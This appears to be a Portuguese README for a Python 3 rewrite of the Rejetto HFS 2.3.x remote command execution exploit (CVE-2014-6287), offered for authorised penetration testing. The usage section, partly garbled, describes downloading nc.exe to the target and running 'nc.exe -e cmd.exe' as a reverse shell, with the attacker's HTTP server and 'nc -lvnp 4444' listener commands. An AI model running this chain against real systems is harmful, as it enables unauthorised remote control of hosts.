Exploit de execução remota de comandos para o Rejetto HTTP File Server 2.3.x (CVE-2014-6287) reescrito em Python 3 para testes modernos de segurança ofensiva.
Esta é uma reescrita em Python 3 do clássico exploit de Execução Remota de Comandos (RCE) que visa o Rejetto HTTP File Server (HFS) v2.3.x, explorando a vulnerabilidade identificada como CVE-2014-6287.
Originalmente descoberto por Avinash Kumar Thapa, também conhecido como "-Acid", esta versão melhora a portabilidade e a usabilidade, fornecendo parametrização completa e compatibilidade moderna.
Esta ferramenta é fornecida exclusivamente para fins educacionais e de teste de penetração autorizado. O uso não autorizado contra sistemas que você não possui ou para os quais não possui permissão explícita para testar é ilegal e antiético.
nc.exenc.exe usando VBScriptnc.exenc.exe -e cmd.exe para estabelecer o reverse shellpython3 exploit.py <TARGET_IP> <TARGET_PORT> <LOCAL_IP> <LISTEN_LOCAL_PORT> <NC_DOWNLOAD_PORT>
Example:
python3 exploit.py 192.168.1.10 80 192.168.1.5 4444 8000
Requirements:
- HTTP server serving nc.exe:
python3 -m http.server 8000
- Listener:
nc -lvnp 4444